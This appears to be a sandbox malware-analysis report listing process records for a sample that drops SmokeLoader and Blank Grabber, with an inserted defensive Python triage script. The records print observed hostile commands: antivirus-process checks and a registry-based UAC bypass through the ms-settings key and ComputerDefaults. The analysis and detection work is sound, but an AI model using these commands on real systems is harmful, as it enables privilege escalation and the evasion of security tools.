                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\Og1SeeXcB2.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:795'405 bytes
                                                                                                                                                                                                                                MD5 hash:150E9FFDAC7F2361C2EFA735929AA268
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                Start time:16:40:06
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /k move Hwy Hwy.cmd & Hwy.cmd & exit
                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                Start time:16:40:06
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                Start time:16:40:06
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:tasklist
                                                                                                                                                                                                                                Imagebase:0xa30000
                                                                                                                                                                                                                                File size:79'360 bytes
                                                                                                                                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                Start time:16:40:06
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                                                                                                                                                                                                Imagebase:0xb70000
                                                                                                                                                                                                                                File size:29'696 bytes
                                                                                                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                Start time:16:40:07
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:tasklist
                                                                                                                                                                                                                                Imagebase:0xa30000
                                                                                                                                                                                                                                File size:79'360 bytes
                                                                                                                                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                Start time:16:40:07
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                                                                                                                                                                                                Imagebase:0xb70000
                                                                                                                                                                                                                                File size:29'696 bytes
                                                                                                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                Start time:16:40:08
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:cmd /c md 1181
                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                Start time:16:40:08
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:findstr /V "perulesserpalacecorrespondence" Video
                                                                                                                                                                                                                                Imagebase:0xb70000
                                                                                                                                                                                                                                File size:29'696 bytes
                                                                                                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                Start time:16:40:08
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:cmd /c copy /b Outlook + Imports 1181\U
                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                Start time:16:40:08
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:1181\End.pif 1181\U
                                                                                                                                                                                                                                Imagebase:0x990000
                                                                                                                                                                                                                                File size:947'288 bytes
                                                                                                                                                                                                                                MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                Start time:16:40:08
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:ping -n 5 127.0.0.1
                                                                                                                                                                                                                                Imagebase:0x460000
                                                                                                                                                                                                                                File size:18'944 bytes
                                                                                                                                                                                                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:13
Start time: 16:40:25
Start date: 08/05/2024
Path: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
Imagebase: 0x990000
File size: 947'288 bytes
MD5 hash: 62D09F076E6E0240548C2F837536A46A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 14
Start time: 16:40:26
Start date: 08/05/2024
Path: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
Imagebase: 0x7ff70f330000
File size: 947'288 bytes
MD5 hash: 62D09F076E6E0240548C2F837536A46A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 15
Start time: 16:40:26
Start date: 08/05/2024
Path: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
Imagebase: 0x990000
File size: 947'288 bytes
MD5 hash: 62D09F076E6E0240548C2F837536A46A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.2017597409.0000000000901000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000F.00000002.2017597409.0000000000901000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.2017513277.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000F.00000002.2017513277.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Has exited: true

Target ID: 17
Start time: 16:40:28
Start date: 08/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 16:40:38
Start date: 08/05/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff72b770000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 20
Start time: 16:40:58
Start date: 08/05/2024
Path: C:\Users\user\AppData\Roaming\wsruwii
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\wsruwii
Imagebase: 0x140000
File size: 947'288 bytes
MD5 hash: 62D09F076E6E0240548C2F837536A46A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 21
Start time: 16:41:18
Start date: 08/05/2024
Path: C:\Users\user\AppData\Local\Temp\DE5A.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Local\Temp\DE5A.exe
Imagebase: 0x7ff6c99c0000
File size: 8'850'847 bytes
MD5 hash: CB769D049C4541F926F5D6B8D1FF5929
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000015.00000003.2406506000.0000025F9EEDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000015.00000003.2406506000.0000025F9EEDA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited: true

Target ID: 22
Start time: 16:41:19
Start date: 08/05/2024
Path: C:\Users\user\AppData\Local\Temp\DE5A.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Local\Temp\DE5A.exe
Imagebase: 0x7ff71e800000
File size: 8'850'847 bytes
MD5 hash: CB769D049C4541F926F5D6B8D1FF5929
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited: true

Target ID: 23
Start time: 16:41:21
Start date: 08/05/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f"
Imagebase: 0x7ff6ccb20000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true
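The process records above carry three of the behaviours the report's signature list flags: the cmd.exe child of DE5A.exe (Target ID 23) writes hkcu\Software\Classes\ms-settings\shell\open\command, the key the auto-elevating fodhelper.exe consults, which is the Fodhelper UAC bypass the Sigma rule fires on; the SmokeLoader stage runs as End.pif out of INetCache and is re-dropped byte-for-byte (same MD5) as the extension-less C:\Users\user\AppData\Roaming\wsruwii; and both of those run from user-writable directories under a name Windows will still execute as a PE. The Python below is an added example, not Joe Sandbox code or output: it parses a constructed copy of five of these records (Target IDs 15, 18, 20, 21 and 23, copied from the listing) and applies those three triage checks. The finding labels, the staging-directory list and the helper names are assumptions made here for illustration.

```python
"""Triage a Joe Sandbox process listing for the behaviours this report flags.

Added example, not Joe Sandbox code. SAMPLE_RECORDS is constructed from the
report's own process entries (Target IDs 15, 18, 20, 21, 23); the finding
labels, directory list and helper names are assumptions made for illustration.
"""
import re
from collections import defaultdict

SAMPLE_RECORDS = r"""
Target ID:15
Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
Commandline:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
MD5 hash:62D09F076E6E0240548C2F837536A46A

Target ID:18
Path:C:\Windows\explorer.exe
Commandline:C:\Windows\Explorer.EXE
MD5 hash:662F4F92FDE3557E86D110526BB578D5

Target ID:20
Path:C:\Users\user\AppData\Roaming\wsruwii
Commandline:C:\Users\user\AppData\Roaming\wsruwii
MD5 hash:62D09F076E6E0240548C2F837536A46A

Target ID:21
Path:C:\Users\user\AppData\Local\Temp\DE5A.exe
Commandline:C:\Users\user\AppData\Local\Temp\DE5A.exe
MD5 hash:CB769D049C4541F926F5D6B8D1FF5929

Target ID:23
Path:C:\Windows\System32\cmd.exe
Commandline:C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f"
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
""".strip()

# fodhelper.exe auto-elevates and honours HKCU\...\ms-settings\shell\open\command,
# so a low-privilege write to that key gets the attacker's path run without a UAC prompt.
UAC_BYPASS_KEY = re.compile(
    r"reg\s+add\s+(hkcu|hkey_current_user)\\software\\classes\\ms-settings\\shell\\open\\command",
    re.IGNORECASE,
)
REG_DATA = re.compile(r'/d\s+"([^"]+)"', re.IGNORECASE)

# User-writable locations the samples in this report execute from (assumed list).
STAGING_DIRS = ("\\appdata\\local\\temp\\", "\\inetcache\\", "\\appdata\\roaming\\")
# Extensions Windows still runs as a PE although they do not look like one,
# plus the empty extension (wsruwii has none).
DISGUISED_EXTS = (".pif", ".scr", ".com", "")


def parse_records(text):
    """Turn the report's 'Key:Value' lines into one dict per process record."""
    records, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")  # first colon only: values contain 'C:\'
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def _extension(path):
    """Extension of the final path component, lower-cased; '' when there is none."""
    name = path.rsplit("\\", 1)[-1]
    return name[name.rfind("."):].lower() if "." in name else ""


def triage(records):
    """Return (target_id, finding, detail) tuples for the three checks."""
    paths_by_md5 = defaultdict(set)
    for rec in records:
        paths_by_md5[rec.get("MD5 hash", "").upper()].add(rec.get("Path", ""))

    findings = []
    for rec in records:
        tid, path, cmd = rec.get("Target ID", "?"), rec.get("Path", ""), rec.get("Commandline", "")
        if UAC_BYPASS_KEY.search(cmd):
            data = REG_DATA.search(cmd)  # the hijacked handler's target, if quoted with /d
            findings.append((tid, "uac_bypass_fodhelper", data.group(1) if data else cmd))
        if any(d in path.lower() for d in STAGING_DIRS) and _extension(path) in DISGUISED_EXTS:
            findings.append((tid, "disguised_pe_in_user_dir", path))
        # Same MD5 under a different path: the stage was copied somewhere else to persist.
        twins = paths_by_md5[rec.get("MD5 hash", "").upper()] - {path}
        for other in sorted(twins):
            findings.append((tid, "same_binary_other_path", other))
    return findings


if __name__ == "__main__":
    for tid, finding, detail in triage(parse_records(SAMPLE_RECORDS)):
        print(f"Target {tid}: {finding}: {detail}")
```

Run against the five constructed records this yields one finding for Target 23 (the handler target C:\Users\user\AppData\Local\Temp\DE5A.exe) and two each for Targets 15 and 20 (disguised extension, plus the other path sharing MD5 62D09F07...); explorer.exe and DE5A.exe itself trigger nothing, which is the point of checking more than "runs from Temp". On a live host the same registry check is the first thing to look at after a Fodhelper hit: the key should not exist under HKCU for an unmodified user profile.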

                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                Start time:16:41:21
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                Start time:16:41:21
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f
                                                                                                                                                                                                                                Imagebase:0x7ff60ebe0000
                                                                                                                                                                                                                                File size:77'312 bytes
                                                                                                                                                                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                Start time:16:41:21
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                Start time:16:41:21
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                Start time:16:41:21
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f
                                                                                                                                                                                                                                Imagebase:0x7ff60ebe0000
                                                                                                                                                                                                                                File size:77'312 bytes
                                                                                                                                                                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                Start time:16:41:21
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                Start time:16:41:22
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                Start time:16:41:22
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\wevtutil.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
                                                                                                                                                                                                                                Imagebase:0x7ff757290000
                                                                                                                                                                                                                                File size:278'016 bytes
                                                                                                                                                                                                                                MD5 hash:1AAE26BD68B911D0420626A27070EB8D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                                Start time:16:41:22
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "computerdefaults --nouacbypass"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                Start time:16:41:22
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                                Start time:16:41:22
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\ComputerDefaults.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:computerdefaults --nouacbypass
                                                                                                                                                                                                                                Imagebase:0x7ff6a0c10000
                                                                                                                                                                                                                                File size:81'920 bytes
                                                                                                                                                                                                                                MD5 hash:D25A9E160E3B74EF2242023726F15416
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                                Start time:16:41:22
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\ComputerDefaults.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\ComputerDefaults.exe" --nouacbypass
                                                                                                                                                                                                                                Imagebase:0x7ff6a0c10000
                                                                                                                                                                                                                                File size:81'920 bytes
                                                                                                                                                                                                                                MD5 hash:D25A9E160E3B74EF2242023726F15416
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                                                Start time:16:41:23
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\ComputerDefaults.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\ComputerDefaults.exe" --nouacbypass
                                                                                                                                                                                                                                Imagebase:0x7ff6a0c10000
                                                                                                                                                                                                                                File size:81'920 bytes
                                                                                                                                                                                                                                MD5 hash:D25A9E160E3B74EF2242023726F15416
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                                                Start time:16:41:24
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\DE5A.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6c99c0000
                                                                                                                                                                                                                                File size:8'850'847 bytes
